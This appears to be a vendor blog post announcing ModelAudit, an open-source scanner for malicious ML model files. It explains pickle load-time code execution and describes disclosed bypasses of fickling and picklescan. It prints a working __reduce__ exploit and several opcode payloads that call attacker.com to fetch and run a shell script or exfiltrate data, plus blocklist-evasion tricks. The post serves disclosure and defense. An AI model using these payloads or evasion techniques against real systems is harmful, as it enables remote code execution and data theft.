Open-Sourcing ModelAudit: Security Scanner for ML Model Files
Before joining Promptfoo, I worked on model scanning at Databricks. Teams pulled models from public registries, ran torch.load(), and treated the artifact like inert data. It isn't inert: model files are executable at load time.
Since joining Promptfoo last September, I've been building ModelAudit, a static security scanner for ML model files. We filed 7 GHSAs against existing scanners, including a CVSS 10.0 universal bypass, and validated against thousands of real models with zero false positives. Last week we released it as an MIT-licensed open-source project.
ModelAudit at a glance
ModelAudit is a static scanner for ML model files. It flags unsafe loading behaviors (deserialization RCE, archive tricks), known CVEs, and suspicious artifacts across 42+ formats, without executing the model or importing ML frameworks.
ModelAudit is the open-source engine (Python, MIT). promptfoo scan-model is a CLI wrapper; you can also run modelaudit scan directly.
```shell
pip install modelaudit
modelaudit scan your_model.pkl
```
The scanning engine runs entirely offline - it never loads or executes the model.
Example output
```
Scanning suspicious_model.pkl...

📊 SCAN SUMMARY
   Files: 1 | Duration: 0.29s
   Security Checks: ✅ 12 passed / ❌ 3 failed

🔍 SECURITY FINDINGS
   🚨 2 Critical | ⚠️ 1 Warning

   └─ 🚨 [suspicious_model.pkl (pos 45)]
      Found REDUCE opcode with non-allowlisted global: posix.system
      Why: The REDUCE opcode calls a callable with arguments, effectively
           executing arbitrary Python functions. This is the primary
           mechanism for pickle-based code execution attacks.
      opcode: REDUCE
      associated_global: posix.system (os.system on Unix)

   └─ ⚠️ [suspicious_model.pkl]
      Model affected by CVE-2025-32434 (PyTorch weights_only bypass)
      severity: CRITICAL
      affected_versions: torch<2.6.1
      remediation: Upgrade to torch>=2.6.1

❌ CRITICAL SECURITY ISSUES FOUND
```
Capabilities:
- Formats: PyTorch, pickle, Keras, ONNX, TensorFlow, GGUF, CoreML, LightGBM, and 34+ more
- Output: Text, JSON, SARIF for CI/CD integration
- Extras: SBOM generation, license detection, secret scanning
- Remote pulls: S3, GCS, Hugging Face Hub, MLflow, JFrog, DVC
```shell
# Scan from Hugging Face
modelaudit scan hf://microsoft/DialoGPT-medium

# SARIF output for GitHub Code Scanning / GitLab SAST
modelaudit scan model.pt --format sarif --output results.sarif

# Via the Promptfoo CLI wrapper (requires Node)
npx promptfoo scan-model model.pt
```
Python 3.10–3.13. Linux, macOS, Windows. No ML framework dependencies.
Who this is for: Platform and AppSec teams that gate model artifacts in CI/CD, and anyone pulling models from public registries or running third-party checkpoints.
Model files execute code at load time
When you pip install a package, you probably run it through a dependency scanner. Most teams do nothing equivalent when they download a model from Hugging Face and call torch.load().
In pickle, __reduce__ defines what gets executed during unpickling:
```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned",))

# When loaded via pickle.loads() or torch.load(),
# os.system() executes the command.
payload = pickle.dumps(Exploit())
```
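This is exactly the kind of payload a static scanner has to catch without ever running it. A minimal sketch of the idea using the stdlib pickletools module, which walks the raw opcode stream (an illustration of the approach, not ModelAudit's actual implementation):

```python
import pickle
import pickletools

class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Exploit())

# Walk the raw opcode stream -- nothing is unpickled or executed.
suspicious = []
for opcode, arg, pos in pickletools.genops(payload):
    # GLOBAL/STACK_GLOBAL resolve a module attribute; REDUCE calls it.
    if opcode.name in ("GLOBAL", "STACK_GLOBAL", "REDUCE"):
        suspicious.append((pos, opcode.name, arg))

print(suspicious)  # the REDUCE near the end is the actual call site
```

A real scanner then has to decide which resolved globals are safe, which is where the allowlist-versus-blocklist question below comes in.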
JFrog found roughly 100 models on Hugging Face containing similar payloads. Those were the obvious ones - flagged and removed.
During a recent round of refinement for ModelAudit, we came across live Hugging Face models - confirmed true positives - that bypass every other scanner in Hugging Face's pipeline:
Rammadaeus/tflite-flex-bypass-poc - A TFLite file with 4 malicious custom operators: FlexWriteFile (write arbitrary files), FlexReadFile (read arbitrary files), FlexPrintV2 (output exfiltration), and EagerPyFunc (arbitrary Python execution).
Every scanner in Hugging Face's pipeline misses this one - VirusTotal, JFrog, and ClamAV report no issues, and picklescan and ModelScan don't support TFLite at all. ModelAudit catches all four malicious operators.
0xnu/mnist-ocr - The mnist_tokenizer.pkl file contains __main__.ImageTokenizer instantiated via the NEWOBJ opcode, a deserialization vector that executes arbitrary code on load.
Only ClamAV flags it, and only via signature matching, not structural analysis. VirusTotal, JFrog, and ModelScan all miss it.
NewstaR/GPTagalog - A 396 MB GPT model for Tagalog. The model-01.pkl file uses torch.storage._load_from_bytes via the REDUCE opcode (21 instances) and loads classes from __main__ scope - the same deserialization pattern used in pickle-based attacks.
VirusTotal, JFrog, and ModelScan all miss it. Only ClamAV flags it via signature matching - not structural analysis. ModelAudit catches the dangerous deserialization pattern.
Freakhobbies/Model-01.pkl - A 7.6 MB PyTorch GPT model with the same pattern: torch.storage._load_from_bytes via REDUCE and __main__ class references.
JFrog and ModelScan report no issue. Picklescan flags suspicious imports but only as informational. ClamAV catches it via signature. ModelAudit reports CRITICAL.
Hugging Face hosts over two million models. Most organizations pull from public registries without scanning what they download.
How we got here
Building at Promptfoo
When I joined Promptfoo, the team was building AI red teaming and code scanning capabilities. We could test how an LLM application behaves at runtime, but had no visibility into whether the models themselves were safe to load. If a model file triggers code execution on deserialization, runtime defenses don't matter. The compromise happens before the application starts.
The team had already built an early version of the scanner with the core architecture in place. When I joined, we expanded it significantly - adding opcode-level bypass detection, growing format coverage to the 42+ formats we support today, and introducing an allowlist-first approach with systematic false positive elimination. The goal was a modern, lightweight scanner with no ML framework dependencies - something you could drop into any CI pipeline without pulling in PyTorch or TensorFlow.
The false positive problem
Every ML framework serializes models differently. The same scikit-learn RandomForest saved with joblib vs pickle vs skops produces different opcode sequences. Upgrading Python or library versions changes which opcodes appear. An allowlist-based scanner that works on Python 3.10 might flag clean models on 3.13. And that's just pickle - every format we added had its own version of this problem: ONNX models with legitimate external data references tripping path traversal checks, Keras archives with custom layer configs that look like code injection, GGUF metadata fields that resemble suspicious strings.
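The protocol sensitivity is easy to demonstrate: the same object serialized under different pickle protocols produces different opcode sets, so an opcode allowlist tuned against one environment can behave differently in another. A stdlib-only sketch:

```python
import pickle
import pickletools

model_like = {"weights": [0.1, 0.2, 0.3], "layers": 2}

def opcode_names(protocol):
    """Set of opcode names produced for model_like at a given protocol."""
    data = pickle.dumps(model_like, protocol=protocol)
    return {op.name for op, arg, pos in pickletools.genops(data)}

p0, p5 = opcode_names(0), opcode_names(5)
print(sorted(p0 - p5))  # opcodes that appear only at protocol 0
print(sorted(p5 - p0))  # opcodes that appear only at protocol 5
```

Protocol 0 emits text-based opcodes like MARK and DICT; protocol 5 uses PROTO, FRAME, EMPTY_DICT, and MEMOIZE instead. An allowlist has to cover all of them.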
We ran several rounds of false positive elimination against real Hugging Face models across every supported format. Each round surfaced new edge cases - legitimate patterns that looked suspicious to heuristic checks. We fixed them all.
The maturity milestone: 1,000+ models scanned across 14 formats, 5,000+ security checks, zero false positives on the final 100-model regression run. Since then, we've expanded to 42+ formats with 12 new scanners and validated against an additional 200+ models - all clean. That result triggered the open-source decision.
ModelAudit started as an internal capability within the Promptfoo platform (promptfoo.dev/model-security). Today's release is the standalone extraction of that scanning engine.
Existing scanners and where they break
Picklescan is integrated into Hugging Face's scanning pipeline and is fast and practical at scale. Fickling by Trail of Bits can decompile pickle streams into readable Python and recently added an allowlist-based scanner. ModelScan by ProtectAI covers Pickle, PyTorch, Keras (H5 and V3), TensorFlow SavedModel, NumPy, and Joblib; ProtectAI's commercial offering Guardian extends to 35+ formats. Safetensors takes the strongest approach: eliminate executable code from the format entirely. If you can use safetensors, you should. But roughly 45% of popular Hugging Face models still use pickle (CCS 2025), and the conversion pipeline itself can be a target.
The common weakness across blocklist-based scanners is architectural: maintain a list of known-dangerous functions and allow everything else through. An attacker only needs to find one function not on the list. Fickling has 12 published GHSAs. Picklescan has 60+. JFrog found 3 zero-day bypasses in picklescan (CVE-2025-10155/10156/10157, CVSS 9.3 each). Sonatype found 4 more (CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945). We reported seven of our own.
Building ModelAudit meant studying the pickle VM closely: how its ~68 opcodes chain together across protocol versions 0–5, how function calls get resolved, and where the gaps are in static analysis. That work kept turning up bypasses in existing scanners.
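To make the opcode listings in the following sections concrete, here is a hand-assembled pickle that resolves a global and calls it via REDUCE - with the harmless os.getcwd standing in for what an attacker would make os.system:

```python
import os
import pickle
import pickletools

# Each byte sequence below is one pickle opcode.
payload = (
    b"\x80\x04"          # PROTO 4
    b"\x8c\x02os"        # SHORT_BINUNICODE "os"
    b"\x8c\x06getcwd"    # SHORT_BINUNICODE "getcwd"
    b"\x93"              # STACK_GLOBAL -> pushes os.getcwd
    b")"                 # EMPTY_TUPLE  -> the (empty) argument tuple
    b"R"                 # REDUCE       -> calls os.getcwd()
    b"."                 # STOP
)

pickletools.dis(payload)        # static view of the opcode stream
result = pickle.loads(payload)  # the call happens here, at load time
assert result == os.getcwd()
```

Swap the two strings for "os" and "system" and add a command argument, and loading the file executes it - which is why every listing below ends in REDUCE.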
Fickling bypasses
We reported four GHSAs against fickling, all fixed by Trail of Bits.
GHSA-5hwf-rc88-82xm - Missing RCE-capable modules in UNSAFE_IMPORTS. At least 3 stdlib modules that provide direct arbitrary command execution were not blocked: uuid, _osx_support, and _aix_support. These modules contain functions that internally call subprocess.Popen() or os.system() with attacker-controlled arguments. Despite the platform-specific names, all three are importable on every platform:
```
# Pickle opcodes:
STACK_GLOBAL uuid _get_command_stdout   # not in UNSAFE_IMPORTS
SHORT_BINUNICODE "curl"
SHORT_BINUNICODE "http://attacker.com"
TUPLE2
REDUCE   # uuid._get_command_stdout("curl", "http://attacker.com")
         # → subprocess.Popen(("curl", "http://..."), stdout=PIPE)
# fickling: LIKELY_SAFE
```
Trail of Bits fixed this in fickling 0.1.9.
GHSA-mxhj-88fx-4pcv (CVSS 8.6) - OBJ opcode invisibility. Fickling's OBJ opcode handler pushed function calls onto the interpreter stack without saving them to the AST. Discard the result with POP and the call vanishes from fickling's analysis entirely:
```
# Pickle opcodes:
OBJ(os.system, "curl attacker.com | sh")   # call happens at load time
POP                                        # result discarded from stack
# → call vanishes from AST, fickling reports LIKELY_SAFE
```
A pickle could spawn a reverse shell and fickling would report LIKELY_SAFE.
CVE-2026-22609 - Missing unsafe imports. My teammate Michael D'Angelo found that fickling's unsafe-imports list was missing high-risk standard library modules including ctypes, importlib, and multiprocessing. A pickle importing ctypes.CDLL to load a shared library passed as safe:
```
# Pickle opcodes (simplified):
GLOBAL ctypes CDLL               # loads ctypes.CDLL
MARK
SHORT_BINUNICODE "./payload.so"  # path to attacker's shared library
TUPLE
REDUCE   # ctypes.CDLL("./payload.so") → loads and executes native code
# fickling: SAFE (ctypes not in unsafe-imports list)
```
Trail of Bits patched this in fickling 0.1.7.
GHSA-mhc9-48gj-9gp3 - Incomplete blocklist missing network and system unsafe imports. Fickling's likely_safe_imports set included all stdlib modules, so dangerous modules like smtplib, socketserver, signal, and sqlite3 were treated as safe. A pickle calling socketserver.TCPServer to open a backdoor listener or smtplib.SMTP to exfiltrate data passed all five safety interfaces:
```
# Pickle opcodes:
STACK_GLOBAL smtplib SMTP   # stdlib module - added to likely_safe_imports
SHORT_BINUNICODE "attacker.com"
TUPLE1
REDUCE   # smtplib.SMTP("attacker.com") → opens TCP connection
# → fickling: LIKELY_SAFE (smtplib is stdlib, skipped by OvertlyBadEvals)
```
Trail of Bits fixed this in fickling 0.1.8.
Picklescan bypasses
On March 3, 2026, we published three GHSAs against picklescan.
GHSA-vvpj-8cmc-gx39 (CVSS 10.0) - pkgutil.resolve_name universal blocklist bypass. pkgutil.resolve_name() is a Python stdlib function that resolves any "module:attribute" string to the actual Python object at runtime. A malicious pickle uses it as the REDUCE callable to obtain a reference to any blocked function - os.system, builtins.exec, anything - without that function's name appearing in the pickle opcodes:
```
# Pickle opcodes (simplified):
GLOBAL pkgutil resolve_name   # not blocked by picklescan
MARK
SHORT_BINUNICODE "os:system"  # the actual target, passed as data
TUPLE
REDUCE   # pkgutil.resolve_name("os:system") → os.system
# picklescan sees: pkgutil.resolve_name → CLEAN
# actual effect: os.system obtained, ready to call with arbitrary arguments
```
The blocklist never sees os.system. It only sees pkgutil.resolve_name, which is not blocked. One opcode sequence bypasses the entire blocklist.
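The laundering step is trivial to reproduce. A harmless demo - resolving the name is all the bypass needs, since the blocked identifier only ever appears as string data:

```python
import os
import pkgutil

# pkgutil.resolve_name turns a "module:attribute" string into the
# object itself; a blocklist scanning globals never sees "os.system".
fn = pkgutil.resolve_name("os:system")
assert fn is os.system
```

In the malicious pickle, the returned callable is then fed to a second REDUCE with attacker-controlled arguments.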
GHSA-g38g-8gr9-h9xp (CVSS 9.8) - Multiple stdlib modules with direct RCE not in blocklist. At least 7 Python stdlib modules that provide direct command execution or code evaluation were not blocked: codeop, code, compileall, py_compile, runpy, profile, and pdb. A malicious pickle importing any of these modules reports 0 issues:
```
# Pickle opcodes:
GLOBAL codeop compile_command   # compiles arbitrary Python source
MARK
SHORT_BINUNICODE "import os; os.system('curl attacker.com | sh')"
TUPLE
REDUCE
# picklescan: CLEAN (codeop not in blocklist)
```
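And codeop really does hand back executable code objects from arbitrary source strings. A harmless demo with a benign statement in place of the payload:

```python
import codeop

# compile_command compiles a complete statement into a code object;
# anything that later exec()s it gets arbitrary code execution.
code_obj = codeop.compile_command("import os; os.getcwd()", symbol="exec")
assert code_obj is not None
exec(code_obj)  # runs the compiled statement
```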
GHSA-7wx9-6375-f5wh (CVSS 9.8) - profile.run() blocklist mismatch. Picklescan blocks profile.Profile.run and profile.Profile.runctx but not the module-level profile.run() function. The blocklist entry Profile.run doesn't match the pickle global name run. profile.run(statement) calls exec() internally:
```
# Pickle opcodes:
GLOBAL profile run   # module-level function, not Profile.run
MARK
SHORT_BINUNICODE "os.system('id')"   # arbitrary Python statement
TUPLE
REDUCE   # profile.run("os.system('id')") → exec() internally
# picklescan blocklist has: profile.Profile.run ← doesn't match "run"
# picklescan result: CLEAN
```
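The exec() path is easy to confirm: the module-level function executes whatever statement string it is given. A harmless demo that writes a marker file instead of running a shell command:

```python
import os
import profile
import tempfile

marker = os.path.join(tempfile.mkdtemp(), "proof.txt")

# profile.run() hands the statement string to exec() under the
# profiler, so any Python code embedded in the string runs.
profile.run(f"open({marker!r}, 'w').close()")

assert os.path.exists(marker)  # the statement really executed
```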
Each gap existed because the blocklist hadn't enumerated that specific entry yet. This is what it means for blocklist-based scanning to be reactive.
Trail of Bits and the picklescan maintainers fixed these quickly. The pickle VM is adversarial territory, and every scanner that operates there will have gaps. We follow coordinated disclosure for all findings and publish POCs as test cases, not weaponized attacks.
ModelAudit is the widest-coverage open-source scanner available, with format-specific analysis across 42+ formats, built-in CVE detection rules, and SARIF output for CI/CD integration. In a head-to-head comparison against ModelScan, ModelAudit detected 16 issues across 11 test files vs ModelScan's 3. Our team has contributed 7 GHSAs across fickling and picklescan. Teams already using picklescan or ModelScan can run ModelAudit alongside them; SARIF results from multiple scanners aggregate in the same CI pipeline.
Format coverage comparison
The most meaningful way to compare scanners is format by format. Here is what each open-source tool covers (March 2026; see each project's repository for current status):
| Format | picklescan | Fickling | ModelScan | ModelAudit |
|---|---|---|---|---|
| Pickle (.pkl/.pickle) | Yes | Yes | Yes | Yes |
| Dill (.dill) | - | - | Yes | Yes |
| PyTorch (.pt/.pth/.bin) | Yes | .pt/.pth | Yes | Yes |
| Joblib (.joblib) | Yes | - | Yes | Yes |
| Skops (.skops) | - | - | - | Yes |
| NumPy (.npy/.npz) | Yes | - | .npy only | Yes |
| Keras H5 (.h5/.hdf5) | - | - | Yes | Yes |
| Keras ZIP (.keras) | - | - | Yes | Yes |
| TensorFlow SavedModel (.pb) | - | - | Yes | Yes |
| TF MetaGraph (.meta) | - | - | - | Yes |
| ONNX (.onnx) | - | - | - | Yes |
| SafeTensors (.safetensors) | - | - | - | Yes |
| GGUF/GGML | - | - | - | Yes |
| JAX/Flax (.msgpack/.orbax) | - | - | - | Yes |
| JAX Checkpoint (.ckpt) | - | - | - | Yes |
| TFLite (.tflite) | - | - | - | Yes |
| ExecuTorch (.pte) | - | - | - | Yes |
| TensorRT (.plan/.engine) | - | - | - | Yes |
| PaddlePaddle (.pdmodel) | - | - | - | Yes |
| OpenVINO (.xml/.bin) | - | - | - | Yes |
| CoreML (.mlmodel/.mlpackage) | - | - | - | Yes |
| MXNet (.params/-symbol.json) | - | - | - | Yes |
| CatBoost (.cbm) | - | - | - | Yes |
| LightGBM (.lgb/.txt/.model) | - | - | - | Yes |
| XGBoost (.bst/.model/.ubj) | - | - | - | Yes |
| RKNN (.rknn) | - | - | - | Yes |
| Torch7 (.t7/.th) | - | - | - | Yes |
| Llamafile (.llamafile) | - | - | - | Yes |
| R Serialized (.rds/.rda) | - | - | - | Yes |
| CNTK (.cntk/.dnn) | - | - | - | Yes |
| PMML (.pmml) | - | - | - | Yes |
| TorchServe MAR (.mar) | - | - | - | Yes |
| Jinja2 Templates (.jinja/.j2) | - | - | - | Yes |
| OCI/Docker Layers (.manifest) | - | - | - | Yes |
| Weight Distribution Analysis | - | - | - | Yes |
| Compressed (.gz/.bz2/.xz/.zst) | - | - | - | Yes |
| ZIP archives (.zip/.npz) | Yes | - | Yes | Yes |
| TAR archives (.tar/.tar.gz) | - | - | - | Yes |
| 7-Zip archives (.7z) | Optional | - | - | Yes |
| Config (JSON/YAML/XML/TOML) | - | - | - | Yes |
| Total format categories | ~4 | ~2 | ~8 | 42+ |
Counts reflect distinct model format categories, not file extensions. All four tools are open source - see each repository for current status.
- picklescan: Pickle, PyTorch, NumPy, Joblib, plus archive support
- Fickling: Pickle, PyTorch (extension-agnostic, operates on pickle byte streams)
- ModelScan: Pickle/Dill/Cloudpickle, PyTorch, Keras H5, Keras V3, TF SavedModel, NumPy (.npy only - .npz not yet implemented), Joblib, plus ZIP support
| Capability | picklescan | Fickling | ModelScan | ModelAudit |
|---|---|---|---|---|
| CVE detection rules | No | No | No | Yes |
| SARIF output | No | No | No | Yes |
| SBOM generation | No | No | No | Yes |
| Secret scanning | No | No | No | Yes |
| License detection | No | No | No | Yes |
| Remote pulls (S3/GCS/HF) | HF/URL | No | No | Yes (S3/GCS/HF/R2/MLflow) |
| Allowlist approach | Partial | Yes | No | Yes |
| No ML framework deps | Yes | Yes | No | Yes |
ModelAudit is not a replacement for these tools - they've all contributed to making this space better.
Get started
The entire scanning engine is in the open-source repository. All scanners, all CVE detection rules, all output formats.
```shell
pip install modelaudit
modelaudit scan your_model.pkl
```
If you find a bypass, we follow coordinated disclosure and will credit you.
Promptfoo also offers ModelAudit with a hosted UI and managed integrations in the platform. The engine is the same open-source code.
Open issues on GitHub or reach out directly.
